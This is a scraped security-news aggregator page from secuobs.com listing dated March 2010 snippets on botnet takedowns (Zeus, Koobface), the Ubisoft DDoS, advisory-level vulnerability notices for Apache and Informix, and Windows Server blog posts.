http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2010-03-14 21:26:35 - Les Tips du Laboratoire Microsoft : Lors de la première ouverture de la session de l Administrateur, Windows vous demande de lui attribuer un mot de passe Pour changer le mot de passe de l Administrateur ou d http://www.secuobs.com/revue/news/201513.shtmlhttp://www.secuobs.com/revue/news/201513.shtml 2010-03-14 00:52:58 - Infosecurity USA Latest News : The US plays host to the largest number of malicious web servers, according to a study released by anti-malware company AVG http://www.secuobs.com/revue/news/201431.shtmlhttp://www.secuobs.com/revue/news/201431.shtml 2010-03-13 13:40:15 - Vigilance vulnérabilités publiques : Plusieurs vulnérabilités d'Oracle Application Server sont corrigées dans le CPU de janvier 2010 http://www.secuobs.com/revue/news/201346.shtmlhttp://www.secuobs.com/revue/news/201346.shtml 2010-03-12 22:24:20 - SearchVMware.com VMware tips and tricks : The VMware-SpringSource acquisition has paved the way for SpringSource to give away its new tc Server Spring Edition to VMware customers IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/201225.shtmlhttp://www.secuobs.com/revue/news/201225.shtml 2010-03-12 10:55:34 - Rootsecure.net : IT World After takedown, botnet-linked ISP Troyak resurfaces The Troyak ISP has found a new upstream provider, returning connectivity to Zeus servers http://www.secuobs.com/revue/news/201043.shtmlhttp://www.secuobs.com/revue/news/201043.shtml 2010-03-12 03:48:33 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/200977.shtmlhttp://www.secuobs.com/revue/news/200977.shtml 2010-03-12 03:35:14 - Security Bloggers Network : Swiss security blog Abusech has reported that the worst Zeus botnet hosting ISP was taken off line yesterday, cutting the botnet s number of servers from 249 to 181 including the six worse onesAbusech wrote As you can see in the chart abov http://www.secuobs.com/revue/news/200967.shtmlhttp://www.secuobs.com/revue/news/200967.shtml 2010-03-12 00:45:14 - Hack In The Box : The shut down and recovery of the Troyak-as command and control center C C for the active Zeus botnet was good news for the whole IT security community But unfortunately, as some botnets struggle, others stay unaffected As part of their relentless effort to stay ahead of cybercriminals, Kaspersky Lab's research and analysis team have recently monitored a surge in Koobface C C servers, the highly prolific worm infesting social networking sites Koobface targets sites such as Facebook and Twitter, and uses compromised legitimate websites as proxies for its main command and control C C server Definition of Command Control Center Command and Control centers are servers maintained by the owners of a botnet and used to enable the infected computers to call back to their masters and get updates and commands, such as downloading new or more malware, or stealing various computer files or personal information, such as banking accounts http://www.secuobs.com/revue/news/200912.shtmlhttp://www.secuobs.com/revue/news/200912.shtml 2010-03-11 21:49:18 - Security Bloggers Network : With the sharp increase of hacking attacks over the last couple of years, and the introduction of a number of regulatory compliance guidelines to follow, web application security has become a key concern for many http://www.secuobs.com/revue/news/200829.shtmlhttp://www.secuobs.com/revue/news/200829.shtml 2010-03-11 17:26:20 - securitystream.info : By Stefan Tanase Yesterday's shut down of Troyak-as was definitely good news for the whole IT security community Seeing cybercriminals getting kicked out from the Internet and then trying to get back inside calls for popcorn and soda But unfortunately, as some botnets struggle, others stay unaffected Koobface, for example, which uses compromised legitimate websites as proxies for their main command and control server Shorten URL http threatpostcom en_us 3uj Click to copy to clipboard or post to Twitter ZeroClipboardsetMoviePath 'http threatpostcom sites all modules threatpost_tweaks ZeroClipboardswf' var clip new ZeroClipboardClient clipsetHandCursor true clipsetText 'http threatpostcom en_us 3uj' clipglue 'short_url_link' , 'short_url_cont' Related posts 1 Video Hides Koobface on Facebook Wall Posts 2 A Closer Look at the Koobface Gang 3 Koobface Stocking Stuffer Malware http://www.secuobs.com/revue/news/200713.shtmlhttp://www.secuobs.com/revue/news/200713.shtml 2010-03-11 17:09:46 - Help Net Security News : The shut down and recovery of the Troyak-as command and control center C C for the active Zeus botnet was good news for the whole IT security community Unfortunately, as some botnets struggle, o http://www.secuobs.com/revue/news/200706.shtmlhttp://www.secuobs.com/revue/news/200706.shtml 2010-03-11 15:52:43 - PenTestIT : Today, we have this post from the Acunetix Web Application Security Blog IIS Web Server Security is a post by the author that introduces us to IIS web server security It explores the major areas of concern from a layman s point of view The author has done an amazing job that we think needs an applause Related PostsMarch IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200688.shtmlhttp://www.secuobs.com/revue/news/200688.shtml 2010-03-11 12:09:37 - Darknet The Darkside : http://www.secuobs.com/revue/news/200639.shtmlhttp://www.secuobs.com/revue/news/200639.shtml 2010-03-11 05:46:58 - Security : Another botnet takes a beating as Kazakh ISP Troyak is taken offline, temporarily disabling most of the command-and-control servers for the Zeus network Read More Computerworld, abusech Read the comments on this post IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200594.shtmlhttp://www.secuobs.com/revue/news/200594.shtml 2010-03-11 04:07:00 - Infosecurity USA Latest News : Computer games giant Ubisoft had to apologize to users after its online gaming service collapsed over the weekend Ubisoft executives said that exceptional demand was to blame for the problem before the company blamed the downtime on an attack, the following day http://www.secuobs.com/revue/news/200518.shtmlhttp://www.secuobs.com/revue/news/200518.shtml 2010-03-11 00:34:49 - Salvatore Fresta : An ultra lightweight webserver with a very small memory usage http://www.secuobs.com/revue/news/200456.shtmlhttp://www.secuobs.com/revue/news/200456.shtml 2010-03-10 19:28:31 - SearchVMware.com VMware tips and tricks : This VMware vCenter definition explains the features and capabilities of vSphere's centralized management tool IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200336.shtmlhttp://www.secuobs.com/revue/news/200336.shtml 2010-03-10 18:08:13 - SearchVMware.com VMware tips and tricks : Hoping to entice more customers to run tc Server Spring Edition with VMware virtualization, SpringSource is giving it away IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/200293.shtmlhttp://www.secuobs.com/revue/news/200293.shtml 2010-03-10 15:14:06 - Les derniers documents du CERTA. : De multiples vulnérabilités dans Microsoft Excel permettent l'exécution de code à distance http://www.secuobs.com/revue/news/200209.shtmlhttp://www.secuobs.com/revue/news/200209.shtml 2010-03-10 13:10:26 - Security International : Optelecom-NKF Inc, a leading global supplier of advanced video surveillance equipment and the manufacturer of Siqura surveillance solutions, today announced the release of its Siqura S-64 video server http://www.secuobs.com/revue/news/200182.shtmlhttp://www.secuobs.com/revue/news/200182.shtml 2010-03-09 23:10:42 - LinuxSecurity.com Latest News : LinuxSecuritycom The Apache HTTP Web Server is the most widely deployed Web server on the Internet today, which means that vulnerabilities in the open source server can have a devastating impact That also makes security updates like the new 2215 release critical, since it addresses several security vulnerabilities in Apache's flagship HTTP Web server http://www.secuobs.com/revue/news/199943.shtmlhttp://www.secuobs.com/revue/news/199943.shtml 2010-03-09 19:18:01 - Exploit DB updates : http://www.secuobs.com/revue/news/199846.shtmlhttp://www.secuobs.com/revue/news/199846.shtml 2010-03-09 10:53:57 - Rootsecure.net : The Register Ubisoft undone by anti-DRM DDoS storm Ubisoft has confirmed its rights management servers were hit by a fierce DDoS attack over the weekend that left some customers unable to play its games for much of Sunday http://www.secuobs.com/revue/news/199681.shtmlhttp://www.secuobs.com/revue/news/199681.shtml 2010-03-09 00:40:36 - securitystream.info : Apache's HTTP web server has a flaw that enables remote server access and total control of a database, according to a security researcher Read the full article ZDNet Australia Shorten URL http threatpostcom en_us 3eJ Click to copy to clipboard or post to Twitter ZeroClipboardsetMoviePath 'http threatpostcom sites all modules threatpost_tweaks ZeroClipboardswf' var clip new ZeroClipboardClient clipsetHandCursor true clipsetText 'http threatpostcom en_us 3eJ' clipglue 'short_url_link' , 'short_url_cont' Related posts 1 Proxy Server Fix in Latest Apache Update 2 BIND Name Server Gets Patched Update 3 Adobe Patches Critical Flash Media Server Flaws http://www.secuobs.com/revue/news/199550.shtmlhttp://www.secuobs.com/revue/news/199550.shtml 2010-03-08 17:06:51 - Graham Cluley's blog : Suspicions are being raised that disgruntled online games players were behind an attack which bombarded a Ubisoft server with traffic over the weekend, effectively bringing game-playing to a standstill Video games publisher Ubisoft tweeted an apology to fans of Assassin's Creed II and Silent Hunter 5, after many PC gamers were left unable to play yesterday http://www.secuobs.com/revue/news/199365.shtmlhttp://www.secuobs.com/revue/news/199365.shtml 2010-03-08 11:08:46 - How to remove : The file names GessMexe, winfilesexe, serverexe have appeared in an virus analysis report You can see the report on this link The virus installer is a 327 KB file It disables Task manager, registry editors and system restore, I have listed Please visit the site for rest of this article IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/199286.shtmlhttp://www.secuobs.com/revue/news/199286.shtml 2010-03-08 01:53:54 - Three Tier Oracle Security in London Paul M. Wright : Hello World, Congratulations to Sentrigo for being nominated again in the SC Awards in the US for Hedgehog http wwwscmagazineuscom scawards2010-finalists section 1309 Just came across an ex-colleague from Pentest Ltd named Simon Fletcher who has started a blog on Oracle Security http blogfifteentwentyonecouk 2010 02 sql92securityhtml Nice post and good luck with the new blog Oracle config issues like these are interesting for already very highly secured http://www.secuobs.com/revue/news/199219.shtmlhttp://www.secuobs.com/revue/news/199219.shtml 2010-03-06 04:16:04 - National Vulnerability Database : Multiple buffer overflows in the authentication functionality in librpcdll in the Informix Storage Manager ISM Portmapper service aka portmapexe , as used in IBM Informix Dynamic Server IDS 10x before 1000TC9 and 11x before 1110TC3 and EMC Legato NetWorker, allow remote attackers to execute arbitrary code via a crafted parameter size http://www.secuobs.com/revue/news/198915.shtmlhttp://www.secuobs.com/revue/news/198915.shtml 2010-03-06 04:16:04 - National Vulnerability Database : Integer signedness error in the authentication functionality in librpcdll in the Informix Storage Manager ISM Portmapper service aka portmapexe , as used in IBM Informix Dynamic Server IDS 10x before 1000TC9 and 11x before 1110TC3 and EMC Legato NetWorker, allows remote attackers to execute arbitrary code via a crafted parameter size that triggers a stack-based buffer overflow http://www.secuobs.com/revue/news/198914.shtmlhttp://www.secuobs.com/revue/news/198914.shtml 2010-03-06 04:16:04 - National Vulnerability Database : The ap_proxy_ajp_request function in mod_proxy_ajpc in mod_proxy_ajp in the Apache HTTP Server 22x before 2215 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service backend server outage via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code http://www.secuobs.com/revue/news/198913.shtmlhttp://www.secuobs.com/revue/news/198913.shtml 2010-03-05 23:51:34 - 4sysops : Office 2010 release date RTM April, available for business May 12, consumers June Released Update Rollup 2 for Exchange Server 2010 Ballmer Says Microsoft Is Betting Its Business on the Cloud All-staff email sent out by Steve Ballmer We Must Move At Cloud Speed Did you understand what the cloud is Analysis Microsoft s Ballmer http://www.secuobs.com/revue/news/198824.shtmlhttp://www.secuobs.com/revue/news/198824.shtml 2010-03-05 22:44:37 - News : Microsoft will discontinue development of Windows Essential Business Server EBS as of June 30, the company announced via a blog IMAGE http://www.secuobs.com/revue/news/198797.shtmlhttp://www.secuobs.com/revue/news/198797.shtml 2010-03-05 16:23:44 - News : Visual Studio Team Explorer 2010, based on Teamprise technology acquired from SourceGear, enables TFS to serve as an ALM server for multiple platforms IMAGE http://www.secuobs.com/revue/news/198681.shtmlhttp://www.secuobs.com/revue/news/198681.shtml 2010-03-05 14:18:05 - SophosLabs blog : As we have commented before 1,2 when content served up from adservers is compromised, the effects can be far reaching, potentially exposing huge numbers of victims to the malicious code as they innocently browse legitimate sites The problem is further complicated by the fact that legitimate ad content is often heavily obfuscated, in order to http://www.secuobs.com/revue/news/198650.shtmlhttp://www.secuobs.com/revue/news/198650.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : Body As you know, I published a post on Blogging on MOSS 2007 SharePoint when I started to use SharePoint 2007 with this blog I basically mentioned a pretty cool SharePoint application from Codeplex in order to support blogging And I still think that it is cool however As you probably have read in other posts I did, I am using ISA Server 2006 as the reverse proxy at the perimeter One of the advantages of using ISA Server among a lot is the possibility of doing link translation This feature actually helps with the problem that internally you might have different names for the server than externally I based a lot on that but it turned out that with SharePoint and Link Translation there are a few gotchas Especially as SharePoint sometimes seems to construct the links and sites in a way ISA is not able to get them do not ask me why and how Where this materialized was with the RSS-Feed Shoaib, thank you for letting me know All the links in my RSS-Feed pointed to the internal server and not to the public URL being wwwhalbheerinfo, which is kind of a problem Well, the way to handle this is Leave it to SharePoint SharePoint has a feature called Alternate Access Mapping This feature is excellent as in conjunction with ISA Server, SharePoint knows that this request comes externally and does the link translation itself Well, this is pretty straightforward You give the SharePoint application the internal and the external name and magically it works it was not THAT easy as I am not a SharePoint specialist but almost Turns out that the cool Codeplex application was a problem kicking in if you use Alternate Access Mapping To cut the story short here I am still using SharePoint as the platform but had to de-install the Codeplex application The good news is the RSS-Feeds work again Roger PS I am wondering I am not too used in using OpenSource applications on that scale What do you do if you use an application in production and a problem like that appears Do you really dive into the code to fix the problem Or do you ask the community the forum entry was about 3 month old without really having an answer Or what do you do Category Microsoft Products TechnologyPublished 20052008 20 24 http://www.secuobs.com/revue/news/198582.shtmlhttp://www.secuobs.com/revue/news/198582.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : Body If you are planning to implement Windows Server 2008, there are two paper recently published that could help you with it Active Directory Certificate Services Upgrade and Migration Guide Configuring and Troubleshooting Certification Authority Clustering in Windows Server 2008 Roger Category Microsoft Products TechnologyPublished 26052008 15 54 http://www.secuobs.com/revue/news/198574.shtmlhttp://www.secuobs.com/revue/news/198574.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : Body Fresh out of press ok, it is out since beginning of April but I just saw it now Brian Komar, the well-known author of several PKI books on Windows Server just released a new book called Windows Server 2008 PKI and Certificate Security If you are planning a Windows Server 2008 PKI, this is a must-read at least knowing Brian's books J Here is the abstract Get in-depth guidance for designing and implementing certificate-based security solutions straight from PKI expert Brian Komar No need to buy or outsource costly PKI services when you can use the robust PKI and certificate-based security services already built into Windows Server 2008 This in-depth reference teaches you how to design and implement even the most demanding certificate-based security solutions for wireless networking, smart card authentication, VPNs, secure email, Web SSL, EFS, and code-signing applications using Windows Server PKI and certificate services A principal PKI consultant to Microsoft, Brian shows you how to incorporate best practices, avoid common design and implementation mistakes, help minimize risk, and optimize security administration Roger Category Microsoft Products TechnologyPublished 03062008 20 00 http://www.secuobs.com/revue/news/198566.shtmlhttp://www.secuobs.com/revue/news/198566.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : Body A question that was often raised after the launch of Windows Server 2008 was about Server Core and our Security Bulletins How do you know whether a Server Core installation needs updating as well We just added a statement to our Security Bulletins this month answering this question As an example in MS08-036 we state under Affected and Non-Affected Software Supported editions of Windows Server 2008 are not affected if installed using the Server Core installation option and in MS08-035 we state For supported editions of Windows Server 2008, the same severity rating applies whether or not installed using the Server Core installation option I hope this helps to make your life a little bit easier Roger Category Microsoft Products ProcessesPublished 11062008 19 36 http://www.secuobs.com/revue/news/198561.shtmlhttp://www.secuobs.com/revue/news/198561.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : Body I just read an article this morning on Linux servers under the Phalanx gun A problem with people, not code There were quite some things which made me think when I read it There was a statement in there, which I obviously did not like at all Linux may be inherently more secure as a system, which is always an interesting discussion The guy writing the blog post claims that Linux is easier to secure than Windows, which I completely disagree with If you know what you do you can secure each and every system However, we do a great deal of work to make sure that our systems are as secure as possible by default and additional provide you with tools like the Security Configuration Wizard to make sure you can secure the system as far as possible and additionally run as secure as possible We know and proved it with a lot of figures that our systems have by far less vulnerabilities than others eg http blogstechnetcom security archive 2008 05 15 q1-2008-client-os-vulnerability-scorecardaspx and third-party research showed clearly that our systems are less at risk than others But as I commented several times already, this discussion does not really lead to more secure systems but just some entertainment for people who like these debates Coming back to the article above One of the conclusions in the article is, that patching is often a people and process problem, rather than a technology problem This is not new either The question to me is, why do people not deploy We do customer surveys about their satisfaction with Microsoft every now and then People are still not too satisfied with the security of our products So, there is still a lot of work to do However, if we ask then whether our updates are easy to deploy, we get a very, very high rating all across the segments and audiences So, why do they not deploy Is it because they are afraid of the downtime Could be, so we have to work harder to reduce the number of reboots is this different in other OS I do not know but I doubt Is it the tools Is it lack of knowledge Is it ignorance I do not know but would love to understand Roger Category Processes Policies Patch Management CompetitionPublished 29082008 12 20 http://www.secuobs.com/revue/news/198537.shtmlhttp://www.secuobs.com/revue/news/198537.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : As you know at least I hope that you do we introduced Network Access Protection with Windows Server 2008 Thomas Shinder now published an article on WindowsSecuritycom about how to implement NAP and IPSec and Domain Isolation via Group Policies It is a first part of a very good step-by-step guide Deploying IPsec Server and Domain Isolation using Windows Server 2008 Group Policy Roger http://www.secuobs.com/revue/news/198515.shtmlhttp://www.secuobs.com/revue/news/198515.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : If is once again one of these posts with the start like I am just sitting in a session Actually I had some time today to visit sessions and look into some things I have never seen We often have discussions around the future of our products and what we in the field think should be in there Then you see just slide ware but sometimes it is not too easy to keep up with the pace of the developers in all the products and see what they are actually developing and how it looks today Therefore I took the opportunity to sit in a session on he Next Version of ISA Serve A Sneak Peak Demo Let me give you an update on it no particular order, just the way I saw it today ISA Server will be renamed in Threat Management Gateway and will be part of the Forefront Suite Therefore TMG the new abbreviation for Threat Management Gateway will collaborate and share information with the other Forefront products in your network eg Forefront Client Security, NAP etc in order to assess the threats and protect information This would mean that if a client sends out information to the Internet on an unusual level, we will block it, but it into Quarantine and Scan it Way cool It you want to, you can block encrypted zip-files Web Protection Scan files that are downloaded by the users for malware and block them on the gateway by the TMG server We can even inspect outbound SSL traffic as we are bridging SSL on the server if you want it The user is informed that SSL will be inspected This is very important from a privacy perspective So, with this technology we can block invalid or expired certs Last but not least here, you can exclude certain sites or site groups eg Finance and Banking from the SSL inspection So, you can configure it the way that you do not inspect the traffic but the certificate will be validated or nothing is done at all For large files, the user gets a page to inform him her that the file is downloaded by the TMG server and scanned there If it is ok, it is forwarded to the client Whether this is kicked off it decided by the download time more than 10s We can handle files in cache as well We include URL filtering Block sites you do not want the users to browse to We can even categorize sites eg to categorize them as Malicious and you can override the setting as you need Logging and Reporting The console itself still looks very similar to what you are used to from ISA Server 2006 there is no need to change a lot, isn t it We enhanced logging with eg the information we just touched upon above There is a new node called Web Access Policy where you configure all the different policies above There is even a really good wizard to deploy these policies Active Protection Technology Network Intrusion System from Microsoft Research named GAPA GAPA will be part of Forefront Client Security as well As I said above, there will be quite some ways to protect your network from attacks By determining unusual behavior we can block traffic from infected machines and in addition we would be able to kick off actions in the rest of the product suite We will deliver signatures to help you a little bit in order to gain some time before you patch as we learned that the average customer needs more than a month to deploy a security update To be clear here This does not replace proper patch management Network Access Protection We include NAP into the VPN part of the product We had quarantine in the VPN implementation of ISA Server 2004 already However, for a lot of customers that took them a long time to deploy as they had to write customer scripts With NAP you can build on the same technology you can deploy on your network and it is much easier than the scripting version However, do not just switch it on this is a project not just a feature The nice thing is that you not only check the machine during the logon but during the whole session So, if the machine falls out of compliance during a session, it is taken into quarantine, fixed and brought back to the network again Array Support You will be able to take two Standard server, join them and have an array There will still be an Enterprise version to manage multiple arrays but for smaller deployments, this is definitely good news And a lot more As I said This is way cool I am looking forward to getting my hands on the final product Roger http://www.secuobs.com/revue/news/198502.shtmlhttp://www.secuobs.com/revue/news/198502.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : Just a quick one We received the FIPS 140-2 certification for Bitlocker in Windows Vista SP1 and Windows Server 2008 The certificates were posted on the CMVP website on November 25th The Security Policy Document along with the certificates can be viewed at, http csrcnistgov groups STM cmvp documents 140-1 1401val2008htm 1054, and http csrcnistgov groups STM cmvp documents 140-1 1401val2008htm 1053 Roger http://www.secuobs.com/revue/news/198491.shtmlhttp://www.secuobs.com/revue/news/198491.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : You know Murphy, don't you I was out of town last week and on Wednesday my monitorus alerts were going off that my webserver, mailserver etc were all offlineAs I can RDP-in to all my servers I still expected to be able to fix it through my 3G card Unfortunately it was a problem with the network card of my main Hyper-V host, which means that this caused a lot of my servers to go offilineOnce I was on my console, I could fix it within an hour - which was on Saturday and therefore I am online againSorry for the outageRoger http://www.secuobs.com/revue/news/198449.shtmlhttp://www.secuobs.com/revue/news/198449.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : During Conficker we realized that a lot of customers are on unsupported OSs I would like to draw your attention to a few things There is a webpage called Microsoft Support Lifecycle where you find all the information on the lifecycle of our products Let me just quote two things Through the policy, Microsoft will offer a minimum of 10 years of support 5 years Mainstream Support and 5 years Extended Support at the supported service pack level for Business and Developer products When a new service pack is released, Microsoft will provide either 12 or 24 months of support for the previous service pack Remark It is 24 months for Windows You can subscribe to a quarterly newsletter with regards to this issue Subscribe to Microsoft Support Lifecycle Quarterly Update Newsletter There is a side, where you can search for products including the products that leave Extended Support eg in the next 6 months http supportmicrosoftcom lifecycle search There is one page dedicated to Service Packs http supportmicrosoftcom gp lifesupsps If you look at that, you will see that Windows Server 2003 Service Pack 1 will be retired on 14 April 2009 This means that this is the last time you will get Security Updates for SP1 If you did not already, please start to roll-out SP2 immediately Hope this helps Roger http://www.secuobs.com/revue/news/198443.shtmlhttp://www.secuobs.com/revue/news/198443.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : We recently revealed the File Classification Infrastructure in Windows Server 2008 R2 This infrastructure can help you to classify files not only based on the location where it is stored but based on content as well However, there is not too much value for me to blog more about that, let the experts speak Classifying files based on location and content using the File Classification Infrastructure FCI in Windows Server 2008 R2 Roger http://www.secuobs.com/revue/news/198411.shtmlhttp://www.secuobs.com/revue/news/198411.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : That s new We have Windows Server 2008 Hyper-V Common Criteria EAL 4 certified The new thing is that we certified it in Germany by the BSI Bundesamt für Sicherheit in der Informationstechnik You can find the report here https wwwbsibundde cae servlet contentblob 612768 publicationFile 35487 0570a_pdfpdf Roger http://www.secuobs.com/revue/news/198378.shtmlhttp://www.secuobs.com/revue/news/198378.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : Well, it was one of these days In order to make photos available to our family we used SharePoint since quite a while It did a fairly decent job but I wanted more fancy stuff So I started to look for something in Silverlight as Silverlight is our web platform I really found something on Codeplex which did about 80pourcents of what I wanted But you know how engineers work it was only 80pourcents So, I took VisualStudio and started to trace and understand the code in order to adapt it and feed back to Codeplex Well, it was an interesting experience but I had to decide that it was not worth the effort Back to square 1 I therefore opened the scope and was just looking for a gallery, which I could use I found one, called Gallery2 Looking into it, I realized that it was written in PHP, which was actually a great thing for me as I read a lot of articles about Windows Server 2008 and PHP and that it shall work excellent worth a try So, let s start As my website on wwwhalbheerinfo is running on SharePoint I did not want to install PHP on it as I had no clue what kind of side-effects I would be generating So I installed a fresh server with Windows Server 2008, packed IIS on top and installed SQL Server as obviously Gallery2 needs a database And now How do I get PHP running on Windows Server 2008 There is a very good description of it on wwwiisnet Using FastCGI to Host PHP Applications on IIS 70 Petty straightforward and it works However, if you use the setup as described, Gallery2 will not work It took my a while and several roll-backs to Snapshots long live Hyper-V until I found out that one of the proposed phpini changes breaks Gallery2 So, if you want to install it, simply renamed the recommended phpini file, restart IIS and go with it So, after having PHP up and running, I simply installed Gallery2 Well, it was not too complicated as I could follow another site on iisnet Gallery2 on IIS And this time you may follow all the proposed changes in phpini - From there on, it is a question of installing the modules and themes, doing some CSS editing and you are done I did it twice I installed all the modules, played with them some of them did not work, some of them were not satisfying at all , then rolled back did I already say that I love the Snapshot functionality in Hyper-V and re-installed Gallery2 with the modules I needed Then did some cosmetics took mainphp as default, did some HTTP-redirection and went live So, this is definitely something I can recommend and PHP on IIS with SQL Server is really easy to get going Oh, by the way Here is the gallery on http galleryhalbheerch or http galleryhalbheerinfo 500x234 1 Have a lot of fun and comments are more than welcome Roger http://www.secuobs.com/revue/news/198367.shtmlhttp://www.secuobs.com/revue/news/198367.shtml 2010-03-04 19:12:53 - Channel 9 : IMAGE Today I'm happy to announce that Windows Server AppFabric Beta 2 is now available In this episode, Byron Tardiff the setup program manager from the AppFabric team, will walk us through two ways you can install Windows Server AppFabric Beta 2 which works with Visual Studio 2010 RC and NET Framework 4 RC For more on how you can install and test out Windows Server AppFabric Beta 2 check out my blog http://www.secuobs.com/revue/news/198080.shtmlhttp://www.secuobs.com/revue/news/198080.shtml 2010-03-04 12:03:32 - SecurityPark.net : Imperva's latest report warns that hackers have become industrialized and represent an exponentially increased threat to individuals, organizations and Government Imperva's report says the emerging industrialization of hacking parallels the way in which the 19th century revolution advanced methods and accelerated assembly from single to mass production The result is that today's cybercrime ind more http://www.secuobs.com/revue/news/197978.shtmlhttp://www.secuobs.com/revue/news/197978.shtml 2010-03-03 11:22:42 - Latest Security Products entries at ESecurity Planet Product Guide : Secure and easy-to-use Antivirus software for the Server-platform Mar 2, 2010 http://www.secuobs.com/revue/news/197525.shtmlhttp://www.secuobs.com/revue/news/197525.shtml 2010-03-02 15:44:59 - News : IBM's new class of x86 servers based on Intel Nehalem-EX chips treat memory, processors and solid-state disk as interchangeable components IMAGE http://www.secuobs.com/revue/news/197134.shtmlhttp://www.secuobs.com/revue/news/197134.shtml 2010-03-02 11:59:17 - Les Tips du Laboratoire Microsoft : Définition des données sensibles Dans un package SSIS, les informations suivantes sont définies comme sensibles Le mot de passe d une chaîne de connex http://www.secuobs.com/revue/news/197084.shtmlhttp://www.secuobs.com/revue/news/197084.shtml 2010-03-02 08:02:05 - News : IBM on Tuesday announced new System x and BladeCenter servers, which are based on a new server design that the company claims will boost application performance while reducing energy costs in data centers IMAGE http://www.secuobs.com/revue/news/197036.shtmlhttp://www.secuobs.com/revue/news/197036.shtml 2010-03-02 04:33:24 - News : The app services technology is intended to boost speed and management of the Web and other programs IMAGE http://www.secuobs.com/revue/news/197003.shtmlhttp://www.secuobs.com/revue/news/197003.shtml 2010-03-02 01:52:33 - Symantec Security Response Podcasts : In ISTR XII Symantec discussed the trend toward increased professionalization and commercialization of malicious activities During this reporting period, this tendency has evolved into a mature, consolidated underground economy http://www.secuobs.com/revue/news/196836.shtmlhttp://www.secuobs.com/revue/news/196836.shtml 2010-03-01 23:01:39 - Packet Storm Security Exploits : Easy FTP Server version 1702 remote buffer overflow RET overwrite exploit http://www.secuobs.com/revue/news/196755.shtmlhttp://www.secuobs.com/revue/news/196755.shtml 2010-03-01 22:34:59 - Channel 9 : IMAGE Every week Laura Paul bring you the hottest topics on the minds of Microsofties Here's the latest from this week Multi-Point Server Announced 3 Designs for Windows Phone 7 Series IE6 Funeral Windows 7 Commercial Parody and finally RikRolling http://www.secuobs.com/revue/news/196724.shtmlhttp://www.secuobs.com/revue/news/196724.shtml 2010-03-01 17:49:00 - Les derniers documents du CERTA. : Une vulnérabilité dans EMC HomeBase Server permet à une personne distante malintentionnée d'exécuter du code arbitraire http://www.secuobs.com/revue/news/196619.shtmlhttp://www.secuobs.com/revue/news/196619.shtml 2010-03-01 13:46:19 - Global Security Mag Online : Parallels annonce l'expansion de ses offres de virtualisation de serveurs pour les environnements Apple en présentant la première solution au monde de type hyperviseur bare metal pour l'Apple Xserve Parallels Server pour Mac Bare Metal Edition Cette nouvelle édition offre une meilleure performance aux applications tournant dans les machines virtuelles sur Xserve Résultat les entreprises peuvent standardiser leur environnement IT sur la plate-forme Apple et les fournisseurs de services cloud - Produits http://www.secuobs.com/revue/news/196563.shtmlhttp://www.secuobs.com/revue/news/196563.shtml 2010-02-27 06:39:40 - New RFCs : 44KB This specification defines Authentication, Authorization, and Accounting AAA interactions between Proxy Mobile IPv6 entities both Mobile Access Gateway and Local Mobility Anchor and a AAA server within a Proxy Mobile IPv6 Domain These AAA interactions are primarily used to download and update mobile node specific policy profile information between Proxy Mobile IPv6 entities and a remote policy store STANDARDS TRACK http://www.secuobs.com/revue/news/196214.shtmlhttp://www.secuobs.com/revue/news/196214.shtml 2010-02-26 20:58:56 - What's New Cenzic Security Blog : Weekly product update Cenzic detects a Sun Java System App Server HTTP TRACE Information Disclosure Vulnerability As of February 26, 2010 Cenzic now detects a Sun Java System App Server HTTP TRACE Information Disclosure Vulnerability BugtraqID 37995 The Sun Java System Application Server is prone to a remote information-disclosure vulnerability Attackers can exploit this issue to obtain potentially sensitive information that can aid in further attacks Background on Cenzic s SmartAttacks Every week, Cenzic s suite of products is updated with the latest vulnerabilities custom, commercial, and open-source to better detect holes in Web applications These Web application vulnerabilities include but not limited to cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types by Erin Swanson Eswanson cenziccom See Also Sun Java System App Server HTTP TRACE Information Disclosure Vulnerability Learn more about this vulnerability on Security Focus http://www.secuobs.com/revue/news/196021.shtmlhttp://www.secuobs.com/revue/news/196021.shtml 2010-02-26 14:06:19 - Neohapsis Labs : By Patrick Toomey Traditional client-server and web applications aren t that different from a security standpoint Sure, native UI controls are great for a nice look and feel, and access to native OS APIs is great for creating a high performance application that integrates well with the target platform But, from a security standpoint, they are on http://www.secuobs.com/revue/news/195916.shtmlhttp://www.secuobs.com/revue/news/195916.shtml 2010-02-25 20:56:09 - 4sysops : End of Support for Windows XP SP2 and Windows Vista with no service packs installed Download Microsoft Baseline Configuration Analyzer 20 Windows Server 2008 R2 Migration Utilities Microsoft can kill botnets Copyright 2006-2010, 4sysops, Digital fingerprint 3db371642e7c3f4fe3ee9d5cf7666eb0 http://www.secuobs.com/revue/news/195668.shtmlhttp://www.secuobs.com/revue/news/195668.shtml 2010-02-25 18:14:27 - News : Zend Server 50 helps users pinpoint the root cause of application problems IMAGE http://www.secuobs.com/revue/news/195605.shtmlhttp://www.secuobs.com/revue/news/195605.shtml 2010-02-25 07:45:26 - Packet Storm Security Exploits : FTP Server By Zhang Boyang remote denial of service exploit http://www.secuobs.com/revue/news/195398.shtmlhttp://www.secuobs.com/revue/news/195398.shtml 2010-02-24 23:45:49 - 4sysops : Download Microsoft Application Virtualization for Remote Desktop Services 46 Microsoft launches Windows MultiPoint Server 2010 Windows Server 2008 